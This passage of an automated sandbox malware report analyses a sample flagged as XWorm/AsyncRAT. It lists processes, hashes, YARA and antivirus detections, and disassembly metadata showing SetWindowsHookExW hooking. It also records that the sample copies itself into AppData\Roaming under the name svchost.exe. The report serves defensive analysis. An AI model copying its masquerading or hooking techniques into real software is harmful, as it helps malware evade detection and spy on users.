                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:13:24:06
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:13:24:06
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:13:24:06
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:6
                                                                                                                                        Start time:13:24:07
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:7
                                                                                                                                        Start time:13:24:11
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                        Imagebase:0x7ff7b4ee0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:13:24:18
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                        Imagebase:0x580000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:640194B0D51307F362B74FD4A4A1761D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 79%, ReversingLabs
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:13:24:26
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                        Imagebase:0xee0000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:640194B0D51307F362B74FD4A4A1761D
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:15:22:24
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                        Imagebase:0x7ff62c610000
                                                                                                                                        File size:468'120 bytes
                                                                                                                                        MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:15:22:24
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                        File size:862'208 bytes
                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:20.8%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:9
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 4316 7ffaac5b2065 4317 7ffaac5b206d SetWindowsHookExW 4316->4317 4319 7ffaac5b2af1 4317->4319 4304 7ffaac5b286d 4305 7ffaac5b287f 4304->4305 4308 7ffaac5b20a8 4305->4308 4307 7ffaac5b28bb 4309 7ffaac5b20b1 SetWindowsHookExW 4308->4309 4311 7ffaac5b2af1 4309->4311 4311->4307

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FFAAC5B0ED9 Relevance: 1.9, Strings: 1, Instructions: 687COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: CAL_^
                                                                                                                                          • API String ID: 0-3140518731
                                                                                                                                          • Opcode ID: 87584cd2be31ed5ec63e80b98d76ca6e9ff4bc83f8645dbb78c90901089cf79b
                                                                                                                                          • Instruction ID: 7e19f67bd6f4a16209ac6f6a5c9cd35d8035e85adf3f5dc66f399a876a0abd8b
                                                                                                                                          • Opcode Fuzzy Hash: 87584cd2be31ed5ec63e80b98d76ca6e9ff4bc83f8645dbb78c90901089cf79b
                                                                                                                                          • Instruction Fuzzy Hash: 2022C7A1F59A4A4FE794EB38C459679BBD6FF89301F408579E00EC32D3DE28A8458781
                                                                                                                                          Function 00007FFAAC5B6C16 Relevance: .5, Instructions: 470COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 467 7ffaac5b6c16-7ffaac5b6c23 468 7ffaac5b6c25-7ffaac5b6c2d 467->468 469 7ffaac5b6c2e-7ffaac5b6cf7 467->469 468->469 473 7ffaac5b6d63 469->473 474 7ffaac5b6cf9-7ffaac5b6d02 469->474 476 7ffaac5b6d65-7ffaac5b6d8a 473->476 474->473 475 7ffaac5b6d04-7ffaac5b6d10 474->475 477 7ffaac5b6d12-7ffaac5b6d24 475->477 478 7ffaac5b6d49-7ffaac5b6d61 475->478 483 7ffaac5b6df6 476->483 484 7ffaac5b6d8c-7ffaac5b6d95 476->484 479 7ffaac5b6d28-7ffaac5b6d3b 477->479 480 7ffaac5b6d26 477->480 478->476 479->479 482 7ffaac5b6d3d-7ffaac5b6d45 479->482 480->479 482->478 486 7ffaac5b6df8-7ffaac5b6ea0 483->486 484->483 485 7ffaac5b6d97-7ffaac5b6da3 484->485 487 7ffaac5b6da5-7ffaac5b6db7 485->487 488 7ffaac5b6ddc-7ffaac5b6df4 485->488 497 7ffaac5b6ea2-7ffaac5b6eac 486->497 498 7ffaac5b6f0e 486->498 489 7ffaac5b6db9 487->489 490 7ffaac5b6dbb-7ffaac5b6dce 487->490 488->486 489->490 490->490 492 7ffaac5b6dd0-7ffaac5b6dd8 490->492 492->488 497->498 499 7ffaac5b6eae-7ffaac5b6ebb 497->499 500 7ffaac5b6f10-7ffaac5b6f39 498->500 501 7ffaac5b6ef4-7ffaac5b6f0c 499->501 502 7ffaac5b6ebd-7ffaac5b6ecf 499->502 507 7ffaac5b6fa3 500->507 508 7ffaac5b6f3b-7ffaac5b6f46 500->508 501->500 503 7ffaac5b6ed3-7ffaac5b6ee6 502->503 504 7ffaac5b6ed1 502->504 503->503 506 7ffaac5b6ee8-7ffaac5b6ef0 503->506 504->503 506->501 509 7ffaac5b6fa5-7ffaac5b704b 507->509 508->507 510 7ffaac5b6f48-7ffaac5b6f56 508->510 519 7ffaac5b7053-7ffaac5b708d call 7ffaac5b70d4 509->519 520 7ffaac5b704d 509->520 511 7ffaac5b6f58-7ffaac5b6f6a 510->511 512 7ffaac5b6f8f-7ffaac5b6fa1 510->512 514 7ffaac5b6f6c 511->514 515 7ffaac5b6f6e-7ffaac5b6f81 511->515 512->509 514->515 515->515 516 7ffaac5b6f83-7ffaac5b6f8b 515->516 516->512 526 7ffaac5b7092-7ffaac5b70b8 519->526 520->519 527 7ffaac5b70ba 526->527 528 7ffaac5b70bf-7ffaac5b70d2 526->528 527->528
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3660d220e50a70738e217bee132eaae97421035fab4bb78a92c166ce4a52b2c2
                                                                                                                                          • Instruction ID: 204cbbc1f0993d221bf120a56836c9faf742792f274323de0e051580ef8baea3
                                                                                                                                          • Opcode Fuzzy Hash: 3660d220e50a70738e217bee132eaae97421035fab4bb78a92c166ce4a52b2c2
                                                                                                                                          • Instruction Fuzzy Hash: EFF1A530509A8E8FEBA8EF28C8557E93BD1FF55310F04826AE84DC7296DF3499458B81
                                                                                                                                          Function 00007FFAAC5B79C2 Relevance: .5, Instructions: 456COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 529 7ffaac5b79c2-7ffaac5b79cf 530 7ffaac5b79da-7ffaac5b7aa7 529->530 531 7ffaac5b79d1-7ffaac5b79d9 529->531 535 7ffaac5b7b13 530->535 536 7ffaac5b7aa9-7ffaac5b7ab2 530->536 531->530 537 7ffaac5b7b15-7ffaac5b7b3a 535->537 536->535 538 7ffaac5b7ab4-7ffaac5b7ac0 536->538 544 7ffaac5b7ba6 537->544 545 7ffaac5b7b3c-7ffaac5b7b45 537->545 539 7ffaac5b7ac2-7ffaac5b7ad4 538->539 540 7ffaac5b7af9-7ffaac5b7b11 538->540 542 7ffaac5b7ad8-7ffaac5b7aeb 539->542 543 7ffaac5b7ad6 539->543 540->537 542->542 546 7ffaac5b7aed-7ffaac5b7af5 542->546 543->542 548 7ffaac5b7ba8-7ffaac5b7bcd 544->548 545->544 547 7ffaac5b7b47-7ffaac5b7b53 545->547 546->540 549 7ffaac5b7b55-7ffaac5b7b67 547->549 550 7ffaac5b7b8c-7ffaac5b7ba4 547->550 555 7ffaac5b7c3b 548->555 556 7ffaac5b7bcf-7ffaac5b7bd9 548->556 551 7ffaac5b7b69 549->551 552 7ffaac5b7b6b-7ffaac5b7b7e 549->552 550->548 551->552 552->552 554 7ffaac5b7b80-7ffaac5b7b88 552->554 554->550 558 7ffaac5b7c3d-7ffaac5b7c6b 555->558 556->555 557 7ffaac5b7bdb-7ffaac5b7be8 556->557 559 7ffaac5b7bea-7ffaac5b7bfc 557->559 560 7ffaac5b7c21-7ffaac5b7c39 557->560 565 7ffaac5b7c6d-7ffaac5b7c78 558->565 566 7ffaac5b7cdb 558->566 561 7ffaac5b7c00-7ffaac5b7c13 559->561 562 7ffaac5b7bfe 559->562 560->558 561->561 564 7ffaac5b7c15-7ffaac5b7c1d 561->564 562->561 564->560 565->566 568 7ffaac5b7c7a-7ffaac5b7c88 565->568 567 7ffaac5b7cdd-7ffaac5b7db5 566->567 578 7ffaac5b7dbb-7ffaac5b7dca 567->578 569 7ffaac5b7c8a-7ffaac5b7c9c 568->569 570 7ffaac5b7cc1-7ffaac5b7cd9 568->570 572 7ffaac5b7ca0-7ffaac5b7cb3 569->572 573 7ffaac5b7c9e 569->573 570->567 572->572 575 7ffaac5b7cb5-7ffaac5b7cbd 572->575 573->572 575->570 579 7ffaac5b7dd2-7ffaac5b7e34 call 7ffaac5b7e50 578->579 580 7ffaac5b7dcc 578->580 587 7ffaac5b7e36 579->587 588 7ffaac5b7e3b-7ffaac5b7e4e 579->588 580->579 587->588
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: aa4775651289dfed308ba6b85a92c94d8894f29a2def8116e2af7d55dc508c3b
                                                                                                                                          • Instruction ID: f1eccbc00b041c27f3977e07809b0d9f8b3102f936bac692075cb7ea5d0300a8
                                                                                                                                          • Opcode Fuzzy Hash: aa4775651289dfed308ba6b85a92c94d8894f29a2def8116e2af7d55dc508c3b
                                                                                                                                          • Instruction Fuzzy Hash: 89E1C430908A8E8FEBA8DF28C8557E97BD1FF55350F04826EE84DC7291DE74A9448BC1
                                                                                                                                          Function 00007FFAAC5B2065 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 152 7ffaac5b2065-7ffaac5b2a9d 164 7ffaac5b2aa3-7ffaac5b2aa8 152->164 165 7ffaac5b2b29-7ffaac5b2b2d 152->165 167 7ffaac5b2aaf-7ffaac5b2ab0 164->167 166 7ffaac5b2ab2-7ffaac5b2aef SetWindowsHookExW 165->166 168 7ffaac5b2af7-7ffaac5b2b28 166->168 169 7ffaac5b2af1 166->169 167->166 169->168
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5210ec17ad45723e338257a99e598d5a6d8f3921da13e48dae3e4b53cf1ddde3
                                                                                                                                          • Instruction ID: d70777ad208a6052baa4ca936e81eeb2c1b130a2674db8dcd6028a090193f623
                                                                                                                                          • Opcode Fuzzy Hash: 5210ec17ad45723e338257a99e598d5a6d8f3921da13e48dae3e4b53cf1ddde3
                                                                                                                                          • Instruction Fuzzy Hash: 0941F67190DA8A8FE718EB68884A6B97FE0FF66320F04417EE04DC3193DE65A805C7D1
                                                                                                                                          Function 00007FFAAC5B2A18 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 172 7ffaac5b2a18-7ffaac5b2a1f 173 7ffaac5b2a2a-7ffaac5b2a9d 172->173 174 7ffaac5b2a21-7ffaac5b2a29 172->174 177 7ffaac5b2aa3-7ffaac5b2aa8 173->177 178 7ffaac5b2b29-7ffaac5b2b2d 173->178 174->173 180 7ffaac5b2aaf-7ffaac5b2ab0 177->180 179 7ffaac5b2ab2-7ffaac5b2aef SetWindowsHookExW 178->179 181 7ffaac5b2af7-7ffaac5b2b28 179->181 182 7ffaac5b2af1 179->182 180->179 182->181
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HookWindows
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2559412058-0
                                                                                                                                          • Opcode ID: d93b203a2ff40d093c6570c90b990a7eaedcd1020df5cc810046df7651b406a1
                                                                                                                                          • Instruction ID: bfc31bd37673004a7cf2fa80af0d749af406c160c87aa6efff040e8a11b53eda
                                                                                                                                          • Opcode Fuzzy Hash: d93b203a2ff40d093c6570c90b990a7eaedcd1020df5cc810046df7651b406a1
                                                                                                                                          • Instruction Fuzzy Hash: 8031F73191CA5D8FEB18EB6CD8066F97BE1FB5A321F00427ED04DC3292DE64A85687D1
                                                                                                                                          Function 00007FFAAC5B20A8 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 252 7ffaac5b20a8-7ffaac5b2a9d 257 7ffaac5b2aa3-7ffaac5b2aa8 252->257 258 7ffaac5b2b29-7ffaac5b2b2d 252->258 260 7ffaac5b2aaf-7ffaac5b2ab0 257->260 259 7ffaac5b2ab2-7ffaac5b2aef SetWindowsHookExW 258->259 261 7ffaac5b2af7-7ffaac5b2b28 259->261 262 7ffaac5b2af1 259->262 260->259 262->261
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HookWindows
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2559412058-0
                                                                                                                                          • Opcode ID: 7f43c572f934bd3938388135a39450c1f91f387c2153d4c3b90db7bc4fb25d06
                                                                                                                                          • Instruction ID: ee61fac95253e1df3898bacb2068cdbbbc9a387b7036b9e7c389158a4fdf94ac
                                                                                                                                          • Opcode Fuzzy Hash: 7f43c572f934bd3938388135a39450c1f91f387c2153d4c3b90db7bc4fb25d06
                                                                                                                                          • Instruction Fuzzy Hash: 5C31F77190CA4D8FEB18EB6CD8056B97BE1FB6A311F00417EE04ED3292DE64A80687D1

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 00007FFAAC5B4FDD Relevance: .4, Instructions: 411COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5781f1c383496b3e5015d88fba428071edbe797949de586417751a22807917e3
                                                                                                                                          • Instruction ID: 50ee5ca0400fdedde3d9bd065e639f8fe7e21feb3844b9df794fbe7d857e1ff8
                                                                                                                                          • Opcode Fuzzy Hash: 5781f1c383496b3e5015d88fba428071edbe797949de586417751a22807917e3
                                                                                                                                          • Instruction Fuzzy Hash: 7CC1E73190CB4D8FDB19DBA8D8466E9BBF1EF56320F04826FD049D3292DE74A845CB91

                                                                                                                                          Executed Functions

                                                                                                                                          Function 00007FFAAC570ED9 Relevance: .7, Instructions: 689COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5ced447147bfbe9f81786a6dc1da53c218857f3d5cf26e41738d2b53b6ce9aa6
                                                                                                                                          • Instruction ID: f5ed88870b38891ef9342125d529efcc29e6ce8cff20d33ac6bb5a28d423f70e
                                                                                                                                          • Opcode Fuzzy Hash: 5ced447147bfbe9f81786a6dc1da53c218857f3d5cf26e41738d2b53b6ce9aa6
                                                                                                                                          • Instruction Fuzzy Hash: 8822F771B5CA5A4FE798EB7CC4596797BD2FF99300F40897DE04EC3292DE28A8458381
                                                                                                                                          Function 00007FFAAC5716D5 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: P_H
                                                                                                                                          • API String ID: 0-4206272840
                                                                                                                                          • Opcode ID: 649e1c934a629b240c0d0a8da1695792ba382b3d0157833dd8b6cdfe701415fa
                                                                                                                                          • Instruction ID: b73e516b32f62a30d42f0eaaed7ebea4804cc16314c2442655f8b6c44778a7e3
                                                                                                                                          • Opcode Fuzzy Hash: 649e1c934a629b240c0d0a8da1695792ba382b3d0157833dd8b6cdfe701415fa
                                                                                                                                          • Instruction Fuzzy Hash: BE515662A4E6C54FE785A77888646767FD9EF87215B0808FFE08EC71D3DD185846C382
                                                                                                                                          Function 00007FFAAC5704D8 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: P_H
                                                                                                                                          • API String ID: 0-4206272840
                                                                                                                                          • Opcode ID: 557576ddd3e52f851cce65f701e5c4e7b4913b1bf310019d39ca0c094c66dc03
                                                                                                                                          • Instruction ID: 390f8458600d03be80d0378d305c6b9edba9f43e8b517bccf603933b384d5b07
                                                                                                                                          • Opcode Fuzzy Hash: 557576ddd3e52f851cce65f701e5c4e7b4913b1bf310019d39ca0c094c66dc03
                                                                                                                                          • Instruction Fuzzy Hash: C531A462B189490FE798FB7CD45AA79B6C6EB99311F0449BEF04EC3293DD689C418381
                                                                                                                                          Function 00007FFAAC570C5E Relevance: .3, Instructions: 253COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 02f3870b536efbc4ba79acb9052317cffc93fdd87676c09f55f08eab38c09788
                                                                                                                                          • Instruction ID: 34860de3d65e4bb9044036c1ef84b61e2a1f37129f81a5090f61cc0fd6fdf6fd
                                                                                                                                          • Opcode Fuzzy Hash: 02f3870b536efbc4ba79acb9052317cffc93fdd87676c09f55f08eab38c09788
                                                                                                                                          • Instruction Fuzzy Hash: 9E717972A5DA8B4FF785A77CC8555F97BE5EF86210F0444BAE04DC3193DD18AC4A8381
                                                                                                                                          Function 00007FFAAC5709A9 Relevance: .1, Instructions: 114COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ae3a1c4e13dc46c5351c5ffe2cb1ca5e1739c0d5902005a1040a1b9fdf70ceab
                                                                                                                                          • Instruction ID: 541854cddb5e04278a8f68ddf085ec2c47e0b50820ecccf3903127e19197bbd7
                                                                                                                                          • Opcode Fuzzy Hash: ae3a1c4e13dc46c5351c5ffe2cb1ca5e1739c0d5902005a1040a1b9fdf70ceab
                                                                                                                                          • Instruction Fuzzy Hash: 0241A471A5CA5A8FEB44EBB8C865AFD7BE1FF98300F508579D009D7292CD38A845C781
                                                                                                                                          Function 00007FFAAC570B48 Relevance: .1, Instructions: 83COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2eb643694192db0a67e1cd9a3c117e92eb5904ea578ccf4e3ff220aa4a9eed78
                                                                                                                                          • Instruction ID: 3d23fac86f60d8bc4da1ac6d3171e8a75c513f41e4e173b9b939a8c657d7075d
